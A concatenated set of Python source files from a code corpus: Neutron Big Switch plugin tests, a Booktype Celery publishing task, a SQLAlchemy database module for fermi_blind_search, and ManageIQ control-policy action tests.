data,
port['id']).get_response(self.api)
self.httpPatch.stop()
uport = self._get_ports(n['network']['id'])[0]
# name should have stayed the same
self.assertEqual(port['name'], uport['name'])
def test_rollback_for_port_delete(self):
with self.network() as n:
with self.port(network_id=n['network']['id'],
device_id='somedevid') as port:
self.httpPatch = patch('httplib.HTTPConnection', create=True,
new=fake_server.HTTPConnectionMock500)
self.httpPatch.start()
self._delete('ports', port['port']['id'],
expected_code=
webob.exc.HTTPInternalServerError.code)
self.httpPatch.stop()
port = self._get_ports(n['network']['id'])[0]
self.assertEqual('BUILD', port['status'])
def test_correct_shared_net_tenant_id(self):
# tenant_id in port requests should match network tenant_id instead
# of port tenant_id
def rest_port_op(self, ten_id, netid, port):
if ten_id != 'SHARED':
raise Exception('expecting tenant_id SHARED. got %s' % ten_id)
with self.network(tenant_id='SHARED', shared=True) as net:
with self.subnet(network=net) as sub:
pref = 'neutron.plugins.bigswitch.servermanager.ServerPool.%s'
tomock = [pref % 'rest_create_port',
pref % 'rest_update_port',
pref % 'rest_delete_port']
patches = [patch(f, create=True, new=rest_port_op)
for f in tomock]
for restp in patches:
restp.start()
with self.port(subnet=sub, tenant_id='port-owner') as port:
data = {'port': {'binding:host_id': 'someotherhost',
'device_id': 'override_dev'}}
req = self.new_update_request('ports', data,
port['port']['id'])
res = req.get_response(self.api)
self.assertEqual(res.status_int, 200)
def test_create404_triggers_sync(self):
# allow async port thread for this patch
self.spawn_p.stop()
with nested(
self.subnet(),
patch('httplib.HTTPConnection', create=True,
new=fake_server.HTTPConnectionMock404),
patch(test_base.RESTPROXY_PKG_PATH
+ '.NeutronRestProxyV2._send_all_data')
) as (s, mock_http, mock_send_all):
with self.port(subnet=s, device_id='somedevid') as p:
# wait for the async port thread to finish
plugin = NeutronManager.get_plugin()
plugin.evpool.waitall()
call = mock.call(
send_routers=True, send_ports=True, send_floating_ips=True,
triggered_by_tenant=p['port']['tenant_id']
)
mock_send_all.assert_has_calls([call])
self.spawn_p.start()
class TestBigSwitchProxyPortsV2IVS(test_plugin.TestPortsV2,
BigSwitchProxyPluginV2TestCase,
test_bindings.PortBindingsTestCase):
VIF_TYPE = portbindings.VIF_TYPE_IVS
HAS_PORT_FILTER = False
def setUp(self):
super(TestBigSwitchProxyPortsV2IVS,
self).setUp()
cfg.CONF.set_override('vif_type', 'ivs', 'NOVA')
class TestNoHostIDVIFOverride(test_plugin.TestPortsV2,
BigSwitchProxyPluginV2TestCase,
test_bindings.PortBindingsTestCase):
VIF_TYPE = portbindings.VIF_TYPE_OVS
HAS_PORT_FILTER = False
def setUp(self):
super(TestNoHostIDVIFOverride, self).setUp()
cfg.CONF.set_override('vif_type', 'ovs', 'NOVA')
def test_port_vif_details(self):
kwargs = {'name': 'name', 'device_id': 'override_dev'}
with self.port(**kwargs) as port:
self.assertEqual(port['port']['binding:vif_type'],
portbindings.VIF_TYPE_OVS)
class TestBigSwitchVIFOverride(test_plugin.TestPortsV2,
BigSwitchProxyPluginV2TestCase,
test_bindings.PortBindingsTestCase):
VIF_TYPE = portbindings.VIF_TYPE_OVS
HAS_PORT_FILTER = False
def setUp(self):
super(TestBigSwitchVIFOverride,
self).setUp()
cfg.CONF.set_override('vif_type', 'ovs', 'NOVA')
def test_port_vif_details(self):
kwargs = {'name': 'name', 'binding:host_id': 'ivshost',
'device_id': 'override_dev'}
with self.port(**kwargs) as port:
self.assertEqual(port['port']['binding:vif_type'],
portbindings.VIF_TYPE_IVS)
kwargs = {'name': 'name2', 'binding:host_id': 'someotherhost',
'device_id': 'other_dev'}
with self.port(**kwargs) as port:
self.assertEqual(port['port']['binding:vif_type'], self.VIF_TYPE)
def test_port_move(self):
kwargs = {'name': 'name', 'binding:host_id': 'ivshost',
'device_id': 'override_dev'}
with self.port(**kwargs) as port:
data = {'port': {'binding:host_id': 'someotherhost',
'device_id': 'override_dev'}}
req = self.new_update_request('ports', data, port['port']['id'])
res = self.deserialize(self.fmt, req.get_response(self.api))
self.assertEqual(res['port']['binding:vif_type'], self.VIF_TYPE)
def _make_port(self, fmt, net_id, expected_res_status=None, arg_list=None,
**kwargs):
arg_list = arg_list or ()
arg_list += ('binding:host_id', )
res = self._create_port(fmt, net_id, expected_res_status,
arg_list, **kwargs)
# Things can go wrong - raise HTTP exc with res code only
# so it can be caught by unit tests
if res.status_int >= 400:
raise webob.exc.HTTPClientError(code=res.status_int)
return self.deserialize(fmt, res)
class TestBigSwitchProxyNetworksV2(test_plugin.TestNetworksV2,
BigSwitchProxyPluginV2TestCase):
def _get_networks(self, tenant_id):
ctx = context.Context('', tenant_id)
return NeutronManager.get_plugin().get_networks(ctx)
def test_rollback_on_network_create(self):
tid = test_api_v2._uuid()
kwargs = {'tenant_id': tid}
self.httpPatch = patch('httplib.HTTPConnection', create=True,
new=fake_server.HTTPConnectionMock500)
self.httpPatch.start()
self._create_network('json', 'netname', True, **kwargs)
self.httpPatch.stop()
self.assertFalse(self._get_networks(tid))
def test_rollback_on_network_update(self):
with self.network() as n:
data = {'network': {'name': 'aNewName'}}
self.httpPatch = patch('httplib.HTTPConnection', create=True,
new=fake_server.HTTPConnectionMock500)
self.httpPatch.start()
self.new_update_request('networks', data,
n['network']['id']).get_response(self.api)
self.httpPatch.stop()
updatedn = self._get_networks(n['network']['tenant_id'])[0]
# name should have stayed the same due to failure
self.assertEqual(n['network']['name'], updatedn['name'])
def test_rollback_on_network_delete(self):
with self.network() as n:
self.httpPatch = patch('httplib.HTTPConnection', create=True,
new=fake_server.HTTPConnectionMock500)
self.httpPatch.start()
self._delete('networks', n['network']['id'],
expected_code=webob.exc.HTTPInternalServerError.code)
self.httpPatch.stop()
# network should still exist in db
self.assertEqual(n['network']['id'],
self._get_networks(n['network']['tenant_id']
)[0]['id'])
class TestBigSwitchProxySubnetsV2(test_plugin.TestSubnetsV2,
BigSwitchProxyPluginV2TestCase):
pass
class TestBigSwitchProxySync(BigSwitchProxyPluginV2TestCase):
def test_send_data(self):
plugin_obj = NeutronManager.get_plugin()
result = plugin_obj._send_all_data()
self.assertEqual(result[0], 200)
class TestBigSwitchAddressPairs(BigSwitchProxyPluginV2TestCase,
test_addr_pair.TestAllowedAddressPairs):
pass
| apache-2.0 | -6,112,451,128,211,050,000 | 41.864952 | 79 | 0.57295 | false |
rob-hills/Booktype | lib/booktype/apps/edit/tasks.py | 1 | 2110 | import json
import celery
import urllib2
import httplib
import sputnik
from booki.editor import models
def fetch_url(url, data):
try:
data_json = json.dumps(data)
except TypeError:
return None
req = urllib2.Request(url, data_json)
req.add_header('Content-Type', 'application/json')
req.add_header('Content-Length', len(data_json))
try:
r = urllib2.urlopen(req)
except (urllib2.HTTPError, urllib2.URLError, httplib.HTTPException):
pass
except Exception:
pass
# should really be a loop of some kind
try:
s = r.read()
dta = json.loads(s.strip())
except:
return None
return dta
@celery.task
def publish_book(*args, **kwargs):
import urllib2
import json
import logging
# set logger
logger = logging.getLogger('booktype')
logger.debug(kwargs)
book = models.Book.objects.get(id=kwargs['bookid'])
data = {
"assets" : {
"testbook.epub" : "http://127.0.0.1:8000/%s/_export/" % book.url_title
},
"input" : "testbook.epub",
"outputs": {
"two" : {
"profile" : "epub",
"config": {
'project_id': book.url_title
},
"output" : "testbook.epub"
}
}
}
logger.debug(data)
result = fetch_url('http://127.0.0.1:8000/_convert/', data)
logger.debug(result)
task_id = result['task_id']
while True:
logger.debug('http://127.0.0.1:8000/_convert/%s' % task_id)
response = urllib2.urlopen('http://127.0.0.1:8000/_convert/%s' % task_id).read()
dta = json.loads(response)
logger.debug(dta)
sputnik.addMessageToChannel2(
kwargs['clientid'],
kwargs['sputnikid'],
"/booktype/book/%s/%s/" % (book.pk, kwargs['version']), {
"command": "publish_progress",
"state": dta['state']
},
myself=True
)
if dta['state'] in ['SUCCESS', 'FAILURE']:
break | agpl-3.0 | 1,521,317,830,055,630,300 | 23.264368 | 88 | 0.536019 | false |
giacomov/fermi_blind_search | fermi_blind_search/database.py | 1 | 14427 | #!/usr/bin/env python
from contextlib import contextmanager
import argparse
import sys
import sshtunnel
from sqlalchemy import *
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from fermi_blind_search.configuration import get_config
from fermi_blind_search import myLogging
_logger = myLogging.log.getLogger("database")
# will store the engine that will connect to the database
_engine = None
# we need this to handle the tables
Base = declarative_base()
# defines the class that will connect to the database
Session = sessionmaker()
@contextmanager
def database_connection(config):
if config.get("SSH db tunnel", "remote_host") != '':
"""
As of now, we are not using this in the real time search. Instead we are using an autossh connection to
facilitate tunneling. However, we are keeping the code here in case an ssh tunnel needs to be established from
a python script in the future.
"""
with sshtunnel.SSHTunnelForwarder(config.get("SSH db tunnel", "remote_host"),
ssh_username=config.get("SSH db tunnel", "username"),
host_pkey_directories=[
config.get("SSH db tunnel", "key_directory")],
remote_bind_address=('127.0.0.1',
int(config.get("SSH db tunnel", "tunnel_port"))),
local_bind_address=('localhost',
int(config.get('Real time', 'db_port'))),
):
db_instance = Database(config)
try:
yield db_instance
except:
raise
finally:
db_instance.close()
else:
db_instance = Database(config)
try:
yield db_instance
except:
raise
finally:
db_instance.close()
class Database(object):
def __init__(self, config):
global Base
global Session
global _engine
# initialize the engine using parameters from the config file
if config.get("Real time", "is_sqlite") == "True":
engine_url = "sqlite:///" + config.get("Real time", "db_path")
else:
engine_url = config.get("Real time", "db_dialect") + "://" + config.get("Real time", "db_username") + ":" + \
config.get("Real time", "db_password") + "@" + config.get("Real time", "db_host") + ":" + \
config.get("Real time", "db_port") + "/" + config.get("Real time", "db_path")
_logger.debug("Database engine URL: %s" % engine_url)
_engine = create_engine(engine_url)
# bind the engine to the Base
Base.metadata.bind = _engine
# bind the engine to the session
Session.configure(bind=_engine)
self._config = config
def create_tables(self):
# create the Analysis and Results tables
Base.metadata.create_all(_engine)
_logger.info("Successfully created database tables")
def delete_analysis_table(self):
# drop the table from the DB
try:
Analysis.__table__.drop()
except:
try:
# another way to drop the table
Analysis.__table__.drop(_engine)
except:
_logger.error('ERROR: Could not delete Analysis Table')
raise
else:
_logger.info("Successfully deleted Analysis table")
def delete_results_table(self):
# drop the table from the DB
try:
Results.__table__.drop()
except:
try:
# another way to drop the table
Results.__table__.drop(_engine)
except:
_logger.error('ERROR: Could not delete Results Table')
raise
else:
_logger.info("Successfully delete Results table")
def add_analysis(self, analysis_vals):
# TODO: which check that analysis_vals contains the correct field?
# TODO: do we want to add a check that the analysis doesn't already exist?
assert (analysis_vals['met_start'] is not None and analysis_vals['duration'] is not None and
analysis_vals['counts'] is not None and analysis_vals['directory'] is not None), \
"One of the parameters to enter the analysis into the database is missing. Parameters are met_start, " \
"duration, counts, and directory"
assert isinstance(analysis_vals["counts"], int), "Counts is not an integer"
try:
# set the values of the analysis to be added to the table
new_analysis = Analysis(met_start=analysis_vals['met_start'], duration=analysis_vals['duration'],
counts=analysis_vals['counts'], directory=analysis_vals['directory'])
_logger.info("Adding this Analysis to the database: %s" % new_analysis)
except KeyError:
_logger.error('ERROR: The analysis you want to add does not have the proper fields!')
raise
except:
raise
else:
# open a session, add the analysis to the table, close the session
session = Session()
session.add(new_analysis)
try:
session.commit()
except:
raise
else:
_logger.debug("Successfully added analysis to db")
def update_analysis_counts(self, met_start, duration, new_counts):
# open a session with the DB
session = Session()
# get the analysis to be updated
results = session.query(Analysis).filter(Analysis.met_start == met_start).filter(
Analysis.duration == duration).all()
# check that there is only one analysis that matches these parameters
assert len(results) != 0, "Cannot update this analysis because it does not exist"
assert len(results) == 1, 'More than one analysis exists with these parameters! This should never happen'
analysis = results[0]
_logger.info("Updating this analysis: %s to have %s counts" % (analysis, new_counts))
# update the counts column of the analysis in question
analysis.counts = new_counts
try:
# commit the change
session.commit()
except:
raise
else:
_logger.debug("Successfully updated analysis")
def add_candidate(self, candidate_vals):
# TODO: which check that condidate_vals contains the correct field?
# TODO: do we want to add a check that the candidate doesn't already exist?
assert (candidate_vals['ra'] is not None and candidate_vals['dec'] is not None and
candidate_vals['met_start'] is not None and candidate_vals['interval'] is not None and
candidate_vals['email'] is not None), \
"One of the parameters to enter the candidate into the database is missing. Parameters are ra, dec, " \
"met_start, interval, email"
try:
# set the values of the result to be added to the table
new_candidate = Results(ra=candidate_vals['ra'], dec=candidate_vals['dec'],
met_start=candidate_vals['met_start'], interval=candidate_vals['interval'],
email=candidate_vals['email'])
_logger.info("Adding this result to the database %s" % new_candidate)
except KeyError:
_logger.error('ERROR: The result you want to add does not have the proper fields')
raise
except:
raise
else:
# open a session, add the result to the table, close the session
session = Session()
session.add(new_candidate)
try:
session.commit()
except:
raise
else:
_logger.debug("Successfully added result to database")
return new_candidate
def get_analysis_between_times(self, start, stop):
_logger.info("Fetching analyses using data between %s and %s" % (start, stop))
# open a session
session = Session()
# get all analyses with met_start or met_stop (met_start + duration) times within the range [start,stop]
return session.query(Analysis).filter(or_(and_(Analysis.met_start >= start, Analysis.met_start <= stop),
and_(Analysis.met_start + Analysis.duration >= start,
Analysis.met_start + Analysis.duration <= stop))).all()
def get_exact_analysis(self, start, stop):
_logger.info("Fetching analysis with met_start = %s and met_start + duration = %s" % (start, stop))
# open a session
session = Session()
# get all analyses with start time and stop times exactly matching the parameters
return session.query(Analysis).filter(and_(Analysis.met_start == start,
Analysis.met_start + Analysis.duration == stop)).all()
def get_results(self, candidate_vals):
# check that candidate vals has the correct fields to perform a search
assert (candidate_vals['ra'] is not None and candidate_vals['dec'] is not None and
candidate_vals['met_start'] is not None and candidate_vals['interval'] is not None), \
"One of the parameters to enter the candidate into the database is missing. Parameters are ra, dec, " \
"met_start, interval"
# open a session
session = Session()
# get the tolerance ranges for determining if we have a match
ra_tol = float(self._config.get("Real time", "ra_tol"))
dec_tol = float(self._config.get("Real time", "dec_tol"))
start_tol = float(self._config.get("Real time", "start_tol"))
int_tol = float(self._config.get("Real time", "int_tol"))
_logger.info("Fetching results within %s of ra, %s of dec, %s of met_start, and %s of interval of %s" %
(ra_tol, dec_tol, start_tol, int_tol, candidate_vals))
# get all results that match the passed candidate within a certain tolerance
return session.query(Results).filter(and_(candidate_vals['ra'] - ra_tol <= Results.ra,
Results.ra <= candidate_vals['ra'] + ra_tol,
candidate_vals['dec'] - dec_tol <= Results.dec,
Results.dec <= candidate_vals['dec'] + dec_tol,
candidate_vals['met_start'] - start_tol <= Results.met_start,
Results.met_start <= candidate_vals['met_start'] + start_tol,
candidate_vals['interval'] - int_tol <= Results.interval,
Results.interval <= candidate_vals['interval'] + int_tol)).all()
def get_results_to_email(self):
_logger.info("Fetching results with email = False (0 in database)")
# open a session
session = Session()
# get all results that have not been emailed yet
return session.query(Results).filter(Results.email == 0).all()
def update_result_email(self, candidate, email_val=False):
_logger.info("Updating result: %s to have email value: %s" % (candidate, email_val))
# open a session
session = Session()
# update the value of the candidate
candidate.email = email_val
try:
# commit the change
session.commit()
except:
raise
else:
_logger.debug("Successfully updated result")
def close(self):
global _logger
_logger.info("Closing database")
Session.close_all()
class Analysis(Base):
# give the table a name
__tablename__ = 'analysis'
# define the columns of the table
met_start = Column(Float(32), Sequence('analysis_met_start_seq'), primary_key=True)
duration = Column(Float(32), Sequence('analysis_duration_seq'), primary_key=True)
counts = Column(Integer)
directory = Column(String(250))
def __repr__(self):
# formatting string so that printing rows from the table is more readable
return "<Analysis(met_start= %s, duration= %s, counts= %s, directory= %s)>" % \
(self.met_start, self.duration, self.counts, self.directory)
class Results(Base):
# give the table a name
__tablename__ = 'results'
# define the columns of the table
ra = Column(Float(32))
dec = Column(Float(32))
met_start = Column(Float(32), Sequence('results_met_start_seq'), primary_key=True)
interval = Column(Float(32), Sequence('results_interval_seq'), primary_key=True)
email = Column(Boolean)
def __repr__(self):
# formatting string so that printing rows from the table is more readable
return "<Results(ra= %s, dec= %s, met_start= %s, interval= %s, email=%s)>" % (self.ra, self.dec,
self.met_start,
self.interval, self.email)
if __name__ == "__main__":
# Allows you to quickly delete and re-create the database.
parser = argparse.ArgumentParser()
parser.add_argument('--config', help='Path to config file', type=get_config, required=True)
parser.add_argument('--clear', help="If set, delete the database tables, and recreate them", action="store_true")
args = parser.parse_args()
configuration = args.config
# start db connection
db = Database(configuration)
if args.clear:
# delete the tables
db.delete_analysis_table()
db.delete_results_table()
# re-create the tables
db.create_tables()
| bsd-3-clause | 5,104,153,105,042,348,000 | 36.375648 | 121 | 0.563249 | false |
okolisny/integration_tests | cfme/tests/control/test_actions.py | 1 | 30857 | # -*- coding: utf-8 -*-
""" Tests used to check whether assigned actions really do what they're supposed to do. Events are
not supported by gc and scvmm providers. Tests are uncollected for these
providers. When the support will be implemented these tests can enabled for them.
Required YAML keys:
* Provider must have section provisioning/template (otherwise test will be skipped)
* RHEV-M provider must have provisioning/vlan specified, otherwise the test fails on provis.
* There should be a 'datastores_not_for_provision' in the root, being a list of datastores that
should not be used for tagging for provisioning. If not present,
nothing terrible happens, but provisioning can be then assigned to a datastore that does not
work (iso datastore or whatever), therefore failing the provision.
"""
import fauxfactory
import pytest
from functools import partial
from cfme.common.provider import cleanup_vm
from cfme.common.vm import VM
from cfme.control.explorer import actions, conditions, policies, policy_profiles
from cfme.infrastructure.provider import InfraProvider
from cfme.infrastructure.provider.scvmm import SCVMMProvider
from cfme.infrastructure.provider.virtualcenter import VMwareProvider
from cfme.infrastructure.provider.rhevm import RHEVMProvider
from cfme.cloud.provider.openstack import OpenStackProvider
from cfme.cloud.provider.azure import AzureProvider
from cfme import test_requirements
from cfme.utils.appliance.implementations.ui import navigate_to
from cfme.utils import conf
from cfme.utils.blockers import BZ
from cfme.utils.generators import random_vm_name
from cfme.utils.hosts import setup_host_creds
from cfme.utils.log import logger
from cfme.utils.pretty import Pretty
from cfme.utils.update import update
from cfme.utils.virtual_machines import deploy_template
from cfme.utils.wait import wait_for, TimedOutError
from . import do_scan, wait_for_ssa_enabled
pytestmark = [
pytest.mark.long_running,
pytest.mark.meta(server_roles="+automate +smartproxy +smartstate"),
pytest.mark.uncollectif(BZ(1491576, forced_streams=['5.7']).blocks, 'BZ 1491576'),
pytest.mark.tier(2),
test_requirements.control
]
class VMWrapper(Pretty):
"""This class binds a provider_mgmt object with VM name. Useful for on/off operation"""
__slots__ = ("_prov", "_vm", "api", "crud")
pretty_attrs = ['_vm', '_prov']
def __init__(self, provider, vm_name, api):
self._prov = provider
self._vm = vm_name
self.api = api
self.crud = VM.factory(vm_name, self._prov)
@property
def name(self):
return self._vm
@property
def provider(self):
return self._prov.mgmt
def __getattr__(self, key):
"""Creates partial functions proxying to mgmt_system.<function_name>(vm_name)"""
func = getattr(self._prov.mgmt, key)
return partial(func, self._vm)
def get_vm_object(appliance, vm_name):
"""Looks up the CFME database for the VM.
Args:
vm_name: VM name
Returns:
If found, returns a REST object
If not, `None`
"""
try:
return appliance.rest_api.collections.vms.find_by(name=vm_name)[0]
except IndexError:
return None
@pytest.fixture(scope="module")
def vm_name(provider):
return random_vm_name("action", max_length=16)
@pytest.fixture(scope="module")
def vm_name_big(provider):
return random_vm_name("action", max_length=16)
@pytest.fixture(scope="function")
def vddk_url(provider):
try:
major, minor = str(provider.version).split(".")
except ValueError:
major = str(provider.version)
minor = "0"
vddk_version = "v{}_{}".format(major, minor)
try:
return conf.cfme_data.get("basic_info").get("vddk_url").get(vddk_version)
except AttributeError:
pytest.skip("There is no vddk url for this VMware provider version")
@pytest.yield_fixture(scope="function")
def configure_fleecing(appliance, provider, vm, vddk_url):
setup_host_creds(provider.key, vm.api.host.name)
appliance.install_vddk(vddk_url=vddk_url)
yield
appliance.uninstall_vddk()
setup_host_creds(provider.key, vm.api.host.name, remove_creds=True)
def _get_vm(request, provider, template_name, vm_name):
if provider.one_of(RHEVMProvider):
kwargs = {"cluster": provider.data["default_cluster"]}
elif provider.one_of(OpenStackProvider):
kwargs = {}
if 'small_template' in provider.data.templates:
kwargs = {"flavour_name": provider.data.templates.get('small_template').name}
elif provider.one_of(SCVMMProvider):
kwargs = {
"host_group": provider.data.get("provisioning", {}).get("host_group", "All Hosts")}
else:
kwargs = {}
try:
deploy_template(
provider.key,
vm_name,
template_name=template_name,
allow_skip="default",
power_on=True,
**kwargs
)
except TimedOutError as e:
logger.exception(e)
try:
provider.mgmt.delete_vm(vm_name)
except TimedOutError:
logger.warning("Could not delete VM %s!", vm_name)
finally:
# If this happened, we should skip all tests from this provider in this module
pytest.skip("{} is quite likely overloaded! Check its status!\n{}: {}".format(
provider.key, type(e).__name__, str(e)))
@request.addfinalizer
def _finalize():
"""if getting REST object failed, we would not get the VM deleted! So explicit teardown."""
logger.info("Shutting down VM with name %s", vm_name)
if (provider.one_of(InfraProvider, OpenStackProvider, AzureProvider) and
provider.mgmt.is_vm_suspended(vm_name)):
logger.info("Powering up VM %s to shut it down correctly.", vm_name)
provider.mgmt.start_vm(vm_name)
if provider.mgmt.is_vm_running(vm_name):
logger.info("Powering off VM %s", vm_name)
provider.mgmt.stop_vm(vm_name)
if provider.mgmt.does_vm_exist(vm_name):
logger.info("Deleting VM %s in %s", vm_name, provider.mgmt.__class__.__name__)
provider.mgmt.delete_vm(vm_name)
# Make it appear in the provider
provider.refresh_provider_relationships()
# Get the REST API object
api = wait_for(
get_vm_object,
func_args=[provider.appliance, vm_name],
message="VM object {} appears in CFME".format(vm_name),
fail_condition=None,
num_sec=600,
delay=15,
)[0]
return VMWrapper(provider, vm_name, api)
@pytest.fixture(scope="module")
def vm(request, provider, setup_provider_modscope, small_template_modscope, vm_name):
return _get_vm(request, provider, small_template_modscope.name, vm_name)
@pytest.fixture(scope="module")
def vm_big(request, provider, setup_provider_modscope, big_template_modscope, vm_name_big):
return _get_vm(request, provider, big_template_modscope.name, vm_name_big)
@pytest.fixture(scope="module")
def name_suffix():
return fauxfactory.gen_alphanumeric()
@pytest.fixture(scope="module")
def policy_name(name_suffix):
return "action_testing: policy {}".format(name_suffix)
@pytest.fixture(scope="module")
def policy_profile_name(name_suffix):
return "action_testing: policy profile {}".format(name_suffix)
@pytest.fixture(scope="module")
def action_collection(appliance):
return appliance.collections.actions
@pytest.fixture(scope="module")
def compliance_condition(appliance):
condition_collection = appliance.collections.conditions
return condition_collection.create(
conditions.VMCondition,
fauxfactory.gen_alpha(),
expression="fill_tag(VM and Instance.My Company Tags : Service Level, Gold)"
)
@pytest.fixture(scope="module")
def policy_collection(appliance):
return appliance.collections.policies
@pytest.fixture(scope="module")
def compliance_policy(vm_name, policy_name, compliance_condition, policy_collection):
compliance_policy = policy_collection.create(
policies.VMCompliancePolicy,
"complaince_{}".format(policy_name),
scope="fill_field(VM and Instance : Name, INCLUDES, {})".format(vm_name)
)
compliance_policy.assign_conditions(compliance_condition)
return compliance_policy
@pytest.yield_fixture(scope="module")
def policy_for_testing(provider, vm_name, policy_name, policy_profile_name, compliance_policy,
compliance_condition, policy_collection, appliance):
control_policy = policy_collection.create(
policies.VMControlPolicy,
policy_name,
scope="fill_field(VM and Instance : Name, INCLUDES, {})".format(vm_name)
)
policy_profile_collection = appliance.collections.policy_profiles
policy_profile = policy_profile_collection.create(
policy_profile_name,
policies=[control_policy, compliance_policy]
)
provider.assign_policy_profiles(policy_profile_name)
yield control_policy
provider.unassign_policy_profiles(policy_profile_name)
policy_profile.delete()
compliance_policy.assign_conditions()
compliance_condition.delete()
compliance_policy.delete()
control_policy.delete()
@pytest.fixture(scope="function")
def vm_on(vm):
""" Ensures that the VM is on when the control goes to the test."""
vm.wait_vm_steady()
if not vm.is_vm_running():
vm.start_vm()
vm.wait_vm_running()
# Make sure the state is consistent
vm.crud.refresh_relationships(from_details=True)
vm.crud.wait_for_vm_state_change(desired_state=vm.crud.STATE_ON, from_details=True)
return vm
@pytest.fixture(scope="function")
def vm_off(provider, vm):
""" Ensures that the VM is off when the control goes to the test."""
vm.wait_vm_steady()
if provider.one_of(InfraProvider, AzureProvider, OpenStackProvider) and vm.is_vm_suspended():
vm.start_vm()
vm.wait_vm_running()
if not vm.is_vm_stopped():
vm.stop_vm()
vm.wait_vm_stopped()
# Make sure the state is consistent
vm.crud.refresh_relationships(from_details=True)
vm.crud.wait_for_vm_state_change(desired_state=vm.crud.STATE_OFF, from_details=True)
return vm
@pytest.mark.provider(
[VMwareProvider, RHEVMProvider, OpenStackProvider, AzureProvider],
scope="module"
)
def test_action_start_virtual_machine_after_stopping(request, vm, vm_on, policy_for_testing):
""" This test tests action 'Start Virtual Machine'
This test sets the policy that it turns on the VM when it is turned off
(https://www.youtube.com/watch?v=UOn4gxj2Dso), then turns the VM off and waits for it coming
back alive.
Metadata:
test_flag: actions, provision
"""
# Set up the policy and prepare finalizer
policy_for_testing.assign_actions_to_event("VM Power Off", ["Start Virtual Machine"])
request.addfinalizer(policy_for_testing.assign_events)
# Stop the VM
vm.stop_vm()
# Wait for VM powered on by CFME
try:
wait_for(vm.is_vm_running, num_sec=600, delay=5)
except TimedOutError:
pytest.fail("CFME did not power on the VM {}".format(vm.name))
@pytest.mark.provider(
[VMwareProvider, RHEVMProvider, OpenStackProvider, AzureProvider],
scope="module"
)
def test_action_stop_virtual_machine_after_starting(request, vm, vm_off, policy_for_testing):
""" This test tests action 'Stop Virtual Machine'
This test sets the policy that it turns off the VM when it is turned on
(https://www.youtube.com/watch?v=UOn4gxj2Dso), then turns the VM on and waits for it coming
back off.
Metadata:
test_flag: actions, provision
"""
# Set up the policy and prepare finalizer
policy_for_testing.assign_actions_to_event("VM Power On", ["Stop Virtual Machine"])
request.addfinalizer(policy_for_testing.assign_events)
# Start the VM
vm.start_vm()
# Wait for VM powered off by CFME
try:
wait_for(vm.is_vm_stopped, num_sec=600, delay=5)
except TimedOutError:
pytest.fail("CFME did not power off the VM {}".format(vm.name))
@pytest.mark.provider(
[VMwareProvider, RHEVMProvider, OpenStackProvider, AzureProvider],
scope="module"
)
def test_action_suspend_virtual_machine_after_starting(request, vm, vm_off, policy_for_testing):
""" This test tests action 'Suspend Virtual Machine'
This test sets the policy that it suspends the VM when it's turned on. Then it powers on the vm,
waits for it becoming alive and then it waits for the VM being suspended.
Metadata:
test_flag: actions, provision
"""
# Set up the policy and prepare finalizer
policy_for_testing.assign_actions_to_event("VM Power On", ["Suspend Virtual Machine"])
request.addfinalizer(policy_for_testing.assign_events)
# Start the VM
vm.start_vm()
# Wait for VM be suspended by CFME
try:
wait_for(vm.is_vm_suspended, num_sec=600, delay=5)
except TimedOutError:
pytest.fail("CFME did not suspend the VM {}".format(vm.name))
@pytest.mark.provider(
[VMwareProvider, RHEVMProvider, OpenStackProvider, AzureProvider],
scope="module"
)
def test_action_prevent_event(request, vm, vm_off, policy_for_testing):
""" This test tests action 'Prevent current event from proceeding'
This test sets the policy that it prevents powering the VM up. Then the vm is powered up
and then it waits that VM does not come alive.
Metadata:
test_flag: actions, provision
"""
# Set up the policy and prepare finalizer
policy_for_testing.assign_actions_to_event("VM Power On Request",
["Prevent current event from proceeding"])
request.addfinalizer(policy_for_testing.assign_events)
# Request VM's start (through UI)
vm.crud.power_control_from_cfme(option=vm.crud.POWER_ON, cancel=False)
try:
wait_for(vm.is_vm_running, num_sec=600, delay=5)
except TimedOutError:
pass # VM did not start, so that's what we want
else:
pytest.fail("CFME did not prevent starting of the VM {}".format(vm.name))
@pytest.mark.meta(blockers=[1439331])
@pytest.mark.provider(
[VMwareProvider, RHEVMProvider, OpenStackProvider, AzureProvider],
scope="module"
)
def test_action_prevent_vm_retire(request, vm, vm_on, policy_for_testing):
"""This test sets the policy that prevents VM retiring.
Metadata:
test_flag: actions, provision
"""
policy_for_testing.assign_actions_to_event("VM Retire Request",
["Prevent current event from proceeding"])
request.addfinalizer(policy_for_testing.assign_events)
vm.crud.retire()
try:
wait_for(lambda: vm.crud.is_retired, num_sec=600, delay=15)
except TimedOutError:
pass
else:
pytest.fail("CFME did not prevent retire of the VM {}".format(vm.name))
@pytest.mark.provider([VMwareProvider], scope="module")
def test_action_prevent_ssa(request, appliance, configure_fleecing, vm, vm_on, policy_for_testing):
"""Tests preventing Smart State Analysis.
This test sets the policy that prevents VM analysis.
https://bugzilla.redhat.com/show_bug.cgi?id=1433084
Metadata:
test_flag: actions, provision
"""
policy_for_testing.assign_actions_to_event("VM Analysis Request",
["Prevent current event from proceeding"])
request.addfinalizer(policy_for_testing.assign_events)
vm.crud.load_details()
wait_for_ssa_enabled()
try:
do_scan(vm.crud)
except TimedOutError:
rc, _ = appliance.ssh_client.run_command("grep 'Prevent current event from proceeding.*"
"VM Analysis Request.*{}' /var/www/miq/vmdb/log/policy.log".format(vm.name))
assert rc == 0, "Action \"Prevent current event from proceeding\" hasn't been invoked"
else:
pytest.fail("CFME did not prevent analysing the VM {}".format(vm.name))
@pytest.mark.provider(
[VMwareProvider, RHEVMProvider, OpenStackProvider, AzureProvider],
scope="module"
)
def test_action_power_on_logged(request, vm, vm_off, appliance, policy_for_testing):
""" This test tests action 'Generate log message'.
This test sets the policy that it logs powering on of the VM. Then it powers up the vm and
checks whether logs contain message about that.
Metadata:
test_flag: actions, provision
"""
# Set up the policy and prepare finalizer
policy_for_testing.assign_actions_to_event("VM Power On", ["Generate log message"])
request.addfinalizer(policy_for_testing.assign_events)
# Start the VM
vm.start_vm()
policy_desc = policy_for_testing.description
# Search the logs
def search_logs():
rc, stdout = appliance.ssh_client.run_command(
"cat /var/www/miq/vmdb/log/policy.log | grep '{}'".format(policy_desc))
if rc != 0: # Nothing found, so shortcut
return False
for line in stdout.strip().split("\n"):
if "Policy success" not in line:
continue
match_string = "policy: [{}], event: [VM Power On], entity name: [{}]".format(
policy_desc, vm.name)
if match_string in line:
logger.info("Found corresponding log message: %s", line.strip())
return True
else:
return False
wait_for(search_logs, num_sec=180, message="log search")
@pytest.mark.provider(
